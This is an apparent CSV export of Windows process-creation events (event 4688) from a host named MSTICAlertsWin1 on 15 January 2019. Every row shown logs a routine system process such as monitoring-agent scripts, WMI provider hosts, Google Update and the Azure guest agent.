266,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x125c,C:\Windows\System32\conhost.exe,%%1936,0xa08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:24.027
267,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:25.650,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10f4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:25.650
268,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1020,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:26.000
269,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:27:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x638,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:27:26.000
270,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:01.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10cc,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,%%1936,0x440,"""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /ua /installsource scheduler",C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:01.517
271,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x107c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:24.003
272,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1064,C:\Windows\System32\conhost.exe,%%1936,0x107c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:24.020
273,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:25.770,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1220,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:25.770
274,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1258,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:26.013
275,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:33.090,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xab8,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,%%1936,0x440,"""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /ua /installsource scheduler",C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:33.090
276,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:11:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbd8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:11:26.000
277,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:24.007
278,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xcd8,C:\Windows\System32\conhost.exe,%%1936,0x123c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:24.023
279,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:25.403,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\MusNotification.exe,%%1936,0x440,C:\Windows\system32\MusNotification.exe Display,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:25.403
280,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:25.590,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa10,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:25.590
281,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1298,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:26.003
282,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:29:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xac4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:29:26.010
283,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:24.007
284,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1128,C:\Windows\System32\conhost.exe,%%1936,0x364,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:24.023
285,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:25.710,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc54,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:25.710
286,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12e8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:26.000
287,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:24.003
288,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17f0,C:\Windows\System32\conhost.exe,%%1936,0x17fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:24.020
289,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:25.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1434,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:25.453
290,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1404,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:26.007
291,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:23:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13a4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:23:26.000
292,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:23:43.103,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10f4,C:\Windows\System32\taskhostw.exe,%%1936,0x440,taskhostw.exe SYSTEM,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:23:43.103
293,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11e8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:24.000
294,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\conhost.exe,%%1936,0x11e8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:24.017
295,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:25.307,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:25.307
296,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x338,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:26.000
297,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:24.000
298,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x640,C:\Windows\System32\conhost.exe,%%1936,0xfbc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:24.017
299,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:25.867,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1320,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:25.867
300,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:26.007
301,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:37.180,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1388,C:\Windows\System32\cmd.exe,%%1936,0x690,"""cmd""",C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:37.180
302,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:37.193,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11c8,C:\Windows\System32\conhost.exe,%%1936,0x1388,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:37.193
303,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:21:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x544,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:21:26.000
304,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x894,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:24.017
305,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xde8,C:\Windows\System32\conhost.exe,%%1936,0x894,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:24.030
306,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:25.360,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x778,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:25.360
307,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x2f8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:26.010
308,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:15:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:15:26.000
309,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1c4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:24.007
310,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x99c,C:\Windows\System32\conhost.exe,%%1936,0x1c4,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:24.027
311,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:25.550,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10c8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:25.550
312,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:26.000
313,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1550,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:24.007
314,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x15d0,C:\Windows\System32\conhost.exe,%%1936,0x1550,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:24.023
